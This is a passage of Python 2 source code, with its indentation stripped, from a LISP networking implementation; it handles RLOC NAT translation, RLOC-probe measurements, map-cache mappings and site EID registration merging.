red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take uptime modulo TTL and if the value is greater than 10% of
# TTL, refresh entry. So that is around every 13 or 14 seconds.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
